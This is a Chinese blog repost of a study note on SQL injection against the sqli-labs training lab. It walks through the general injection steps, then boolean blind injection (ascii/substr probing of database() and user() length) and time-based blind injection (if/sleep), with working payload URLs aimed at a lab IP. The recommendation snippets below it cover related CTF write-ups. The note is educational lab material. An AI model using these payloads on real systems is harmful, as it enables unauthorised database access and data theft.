SQL注入-2

最新推荐文章于 2024-07-19 00:12:38 发布
最新推荐文章于 2024-07-19 00:12:38 发布
阅读量146 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/Abelte/p/8881424.html
版权

SQL注入的一般步骤

1.报错:需要用单引号 双引号 或者左小括号判断字符串 被什么包裹

2.正常:闭合语句,让语句不出现语法错误

3.判断列数 : order by 关键字

4.查询想要的内容 联合查询 union

基于报错的注入方式

 

布尔型盲注

条件:页面存在异常情况 ,但没有回显且没有报错信息

ascii('test') 返回 ascii码

ascii码范围是 0~127

 返回指定字符串最左侧字符的ASCII值

 练习1.

 

目标:http://10.1.2.5:10631/sqli/Less-8/?id=1

方法:布尔型盲注

 

http://10.1.2.5:10631/sqli/Less-8/?id=1' 页面显示不正常

 

http://10.1.2.5:10631/sqli/Less-8/?id=1" 页面显示正常

 

http://10.1.2.5:10631/sqli/Less-8/?id=1) 页面显示正常  说明存在单引号注入

 

http://10.1.2.5:10631/sqli/Less-8/?id=1' and  ascii(substr(database(),1,1)) =0 %23 使用二分法进行实验 如果正确页面显示正常

http://10.1.2.5:10631/sqli/Less-8/?id=1' and  ascii(substr(database(),1,1)) =115 %23

查询当前数据库用户名的长度

user():
连接时指定的user name 和 连接时客户端的host(可以连接这个数据库的用户)
 
current_user():
认证时的用户名和host name,对应 mysq.user表中的记录(当前连接这个数据库的用户)

length() 返回内容的长度

char() 返回ascii码对应的字符 比如,char(114) => r

http://10.1.2.5:10631/sqli/Less-8/?id=1' and  length(user())=14 %23

 

时间型盲注

条件:不管输入什么页面都没有任何异常,且没有回显没有报错信息

select if(True,2,3) => 2

select if(False,2,3) =>3

select if( payload,sleep(3),1) 如果payload 是真 三秒后执行 如果是假 立即执行

select if(length(current_user())>10,sleep(2),1); 查询当前用户名的长度是多少

转载于:https://www.cnblogs.com/Abelte/p/8881424.html

ahu0076
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入-二阶注入
xdjxi的博客
02-18 622
实验目的 理解二阶注入的原理及发生的场景,了解二阶注入与普通注入的区别,熟悉二阶注入的方法和过程。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-24为入口,利用二阶注入的方式将目标用户名admin的密码更改成指定的aabbcc. 1.访问SQLi-Labs网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs网站Less-24。访问的URL为: http://[靶机IP]/sqli-labs/Less-24
SQL注入--二次注入
weixin_44940180的博客
08-07 443
原理 攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入 防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中 当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入 二次注入,可以概括为以下两步: 第一步:插入恶意数据 进行数据库插入数据时,对其中的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。 第二步:引用恶意数据 开发者默认存入数据库的数据都是安全的
[第一章 web入门]SQL注入-2 题目分析与详解
2302_79800344的博客
02-26 900
一、题目简介。
SQL注入2
ppbgi的博客
03-10 247
一、常见的注入方式: 报错注入: 报错思路: 使用各类函数使得数据库抛出异常或错误来获取数据的目的; 常见的报错注入: 1、extractvalue() 2、floor() 3、updataxml() 4、exp() 5、geometrycollection() 6、multipoint() 7、polygon() 8、multipolygon() 9、linestring() 10、multilinestring() 报错的原理: 1、BIGINT等数据类型的溢出 2、xpath语法
学习笔记-SQL注入-2
weixin_52501704的博客
09-15 351
SQL注入-二次注入(原理)
2.2 报错注入
n0d_xy的博客
04-14 344
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
[第一章 web入门]SQL注入-2
陈艺秋的博客
06-11 396
因为爆破的数据较长,而且burp爆破模块我这里不知道咋自动排序,所以可以采取导出数据存储为excel排序输出,或者用一段python代码输出。这种登录界面一般都是字符型注入,所以测试一下闭合符,没想到页面回显账号不存在。如果爆不出来,有很多429状态码的响应页时,可以考虑换网络或者降低爆破线程。但是居然没提示,我都检查了好几遍我注入的语句是否正确,最后还是看wp出来的。知道数据库长度后,我们就利用burp抓包进行爆破,按照顺序获得数据库名称。访问login.php后,是一个登录界面,直接测试注入类型。
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
09-sql注入-mssql1
08-03
SQL注入是一种常见的安全漏洞,攻击者通过输入恶意SQL语句来获取未授权的数据或执行恶意操作。针对SQL Server,攻击者可能使用的注入技术包括: 1. 判断是否存在注入漏洞。 2. 确定数据库类型。 3. 猜测表名和字段。...
SQL注入-防范-ppt.pptx
10-27
SQL相关资料
SQL注入--第二关详细讲解
MAY的博客
04-18 1012
SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
Linux操作系统 sleep(0)、sleep(1)和sleep(-1)的区别,他们各有什么作用
热门推荐
boshuzhang的专栏
03-26 1万+
Linux操作系统 sleep(0)、sleep(1)和sleep(-1)的区别,他们各有什么作用? freeboy1015 2 票 2598 sleep(0)、sleep(1)、sleep(-1)的区别,他们各有什么作用?对于Sleep(1)所产生的效果,在不同的系统上会/有不同的表现吗?sleep
N1_book SQL注入-2(报错注入)
hxhabcd123的博客
08-29 1105
本题使用了burpsuite工具进行抓包和改包,所以借助本题记录该工具抓包和改包的基本使用
0到1 ctfer: SQL注入-2
Zeker62的博客
08-31 1944
分析这个靶场 : 登录靶场,只有一个空空的界面: 很明显,这是一个登录到账号密码的关于SQL注入的题目 尝试输入admin和其他用户名,发现是不一样的报错: 说明这里的机制是:先检查账号是否存在,再检查账号和密码是否对应 由此可以使用burpsuite抓包进行报错注入的操作: 经过抓包,在burp上显示不同的内容: “账号不存在” “账号和密码错误” 所以由此可以判断出,账号密码是否正确,来源于报错: 用户名正确报错:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 495
ctf题解
《从0到1:CTFer成长之路》SQL注入-2
tr_trTTT的博客
04-13 3279
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入 上面就是题目,有登录框,我们先用手工测试sql注入。 手工方法: 1. 随便输入一个账号试试: 输入admin显示账号或密码错误,输入其他显示账号不存在,所以这里可以判断账号是admin; 2.开始判断注入 ...
MySQL(事务、索引)&&MyBatis
最新发布
hycccccch的博客
07-19 554
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
[第一章 web入门]sql注入-2
03-16
SQL注入是一种常见的网络攻击方式,攻击者通过在输入框中输入恶意代码,从而获取数据库中的敏感信息或者对数据库进行恶意操作。为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值